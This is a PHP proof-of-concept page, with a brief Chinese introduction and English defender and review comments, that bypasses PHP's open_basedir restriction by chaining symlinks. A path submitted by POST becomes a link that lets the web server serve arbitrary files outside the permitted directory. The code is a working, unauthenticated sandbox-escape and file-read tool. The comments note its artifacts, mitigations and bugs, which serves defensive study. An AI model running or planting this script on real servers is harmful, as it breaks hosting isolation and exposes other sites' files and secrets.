bypass open_basedir
在了解 symlink() 绕过 open_basedir 的原理后,自己写了这段代码。已在 Kali Linux 上测试通过;在 Windows 上,路径处理部分需要修改。
<?php
/*
 * title: bypass open_basedir
 * auth:  eT48
 * blog:  http://blog.csdn.net/et48_sec
 *
 * Proof-of-concept page. It takes a path from a POST request, builds a pair
 * of symlinks in the current working directory and answers with an HTML link
 * to the second one. A plain GET renders a small form that also prints the
 * configured open_basedir value and the PHP version.
 *
 * Defender notes:
 *  - The whole script depends on symlink() being callable from PHP. Listing
 *    symlink (and link) in disable_functions removes that primitive.
 *    open_basedir should not be the only isolation between sites; separate
 *    OS users, chroot or containers do not depend on PHP's path checks.
 *  - The link that is returned is a relative URL, so it is presumably fetched
 *    through the web server rather than through PHP. Server-side symlink
 *    policy therefore matters too (for Apache, SymLinksIfOwnerMatch rather
 *    than FollowSymLinks; for nginx, disable_symlinks).
 *  - Artifacts left after each request: one symlink and one directory in the
 *    script's working directory, each named with six characters drawn from
 *    A-Z0-9. Neither is removed by this code. The symlink's target string
 *    contains a run of "/.." segments.
 *
 * Review notes on the code as written (nothing below is changed here):
 *  - The header name is misspelled ("Conten-type") and the value uses
 *    "charset:udf-8", so no Content-Type/charset is actually set by it.
 *  - error_reporting(0) plus unchecked return values means every failing
 *    mkdir/chdir/symlink/unlink call goes unnoticed.
 *  - There is no authentication, $_POST['path'] is not validated, and it is
 *    echoed back into HTML (href text) without escaping.
 *  - In the inline script, <?php $_SERVER["REQUEST_URI"] ?> has no echo, so
 *    targeturl is always the empty string.
 *  - jQuery is loaded from a third-party host over plain http.
 *  - check() is an empty stub and is not called anywhere in this file.
 */
header("Conten-type:text/html; charset:udf-8");
// Silence all PHP diagnostics for the rest of the request.
error_reporting(0);
@clearstatcache();

/**
 * Build a random 6-character name from A-Z and 0-9.
 *
 * The alphabet is shuffled and the first six entries are taken, so the
 * result never repeats a character.
 *
 * @return string six-character name
 */
function randStr(){
    $arr = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
    shuffle($arr);
    $arr = array_slice($arr, 0, 6);
    $str = implode($arr);
    return $str;
}

/**
 * Recursively delete a directory and everything below it.
 *
 * @param string $dir directory to remove
 * @return bool result of the final rmdir() on $dir
 */
function delTree($dir){
    // Directory listing without the "." and ".." entries.
    $files = array_diff(scandir($dir), array('.','..'));
    foreach ($files as $file) {
        // NOTE(review): is_dir() resolves symlinks, so a link to a directory
        // would be descended into rather than unlinked.
        (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
    }
    return rmdir($dir);
}

/**
 * Empty placeholder; it has no body and nothing in this file calls it.
 */
function check($filename){}

/**
 * Create the symlink pair for $path and return an HTML link to it.
 *
 * All work happens relative to the current working directory, which is
 * changed repeatedly and restored by counting levels. No return value of
 * mkdir/chdir/symlink/unlink is checked.
 *
 * @param string $path path taken from the request, used unmodified
 * @return string HTML anchor pointing at the created link, followed by <br>
 */
function bypassdir($path){
    // Path components. The loops below start at index 1, so element 0 (the
    // empty string when $path begins with the separator) is skipped.
    $paths = explode(DIRECTORY_SEPARATOR,$path);
    $cwd = getcwd();
    // Number of "/" in the working directory, used as its depth. The "/" is
    // hard-coded here while explode() uses DIRECTORY_SEPARATOR, which matches
    // the author's remark that Windows path handling needs changes.
    $num = preg_match_all('/\//',$cwd);
    $tempfn = randStr();
    $tempdir = "";
    $expstr = "";
    $templink = randStr();
    $explink = randStr();
    $res = "";
    // Scratch directory inside the working directory.
    mkdir($tempfn);
    chdir($tempfn);
    // Recreate the requested path as real, empty directories inside the
    // scratch directory. Component names come straight from the request.
    for($i=1; $i<count($paths); $i++){
        mkdir($paths[$i]);
        chdir($paths[$i]);
    }
    // Step back up to the scratch directory.
    for($i=1; $i<count($paths); $i++){
        chdir("..");
    }
    // Nest $num+1 further directories, each named like the scratch directory.
    for($i=1; $i<=$num+1; $i++){
        mkdir($tempfn);
        chdir($tempfn);
    }
    // Absolute path of the deepest nested directory.
    $tempdir = getcwd();
    // $num+2 levels up returns to the original working directory, assuming
    // every mkdir/chdir above succeeded.
    for($i=1; $i<=$num+2; $i++){
        chdir("..");
    }
    // One "/.." per nested level created above.
    for($i=1; $i<=$num+1; $i++){
        $expstr .="/..";
    }
    // First link: points at the deepest nested directory.
    symlink($tempdir,$templink);
    // Second link: its target string goes through the first link, up $num+1
    // levels, then appends $path. While the first link exists this resolves
    // to the copy of $path built inside the scratch directory.
    // Presumably this is the moment symlink() applies its open_basedir
    // check; that check is not visible in this file.
    symlink($templink.$expstr.$path,$explink);
    // Replace the first link with a real directory of the same name. The
    // second link's target string is unchanged, but it now starts from a
    // directory $num+1 levels below the root instead of the nested directory.
    unlink($templink);
    mkdir($templink);
    // Remove the scratch tree. $templink and $explink are left in place.
    delTree($tempfn);
    // NOTE(review): $path is inserted into HTML without escaping.
    $res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";
    return $res;
}

$res= "";
// POST with a non-empty "path": run bypassdir() on it, print the link, stop.
// Any client that can reach this page can trigger it; no access check exists.
if(!empty($_POST['path'])){
    $path = $_POST['path'];
    $res = bypassdir($path);
    echo $res;
    die();
}
?><html><head><title>open_basedir</title></head><body>Titile: bypass open_basedir<br>Auth: eT48<br> Blog: http://blog.csdn.net/et48_sec<br>Open_basedir: <?php echo ini_get('open_basedir'); ?><br>PHPVersion: <?php echo "PHP ".phpversion();?><br><br><form method='post'>path <input id='path' type='text' style='width:450px'><input type='button' onclick='bypassdir()' value='submit' ></form><div id='output'></div><script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script><script>var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';function 
send_post(targetdata,callback){$.ajax({url:targeturl,type:'POST',data:targetdata,dataType:'text',success:function(res){callback(res);},error:function(){}})}function bypassdir(){ path = $('#path').val(); if( path!=''){ send_post({ path:path},function(res){ $('#output').append(res);})}}</script></body></html><?php die();?>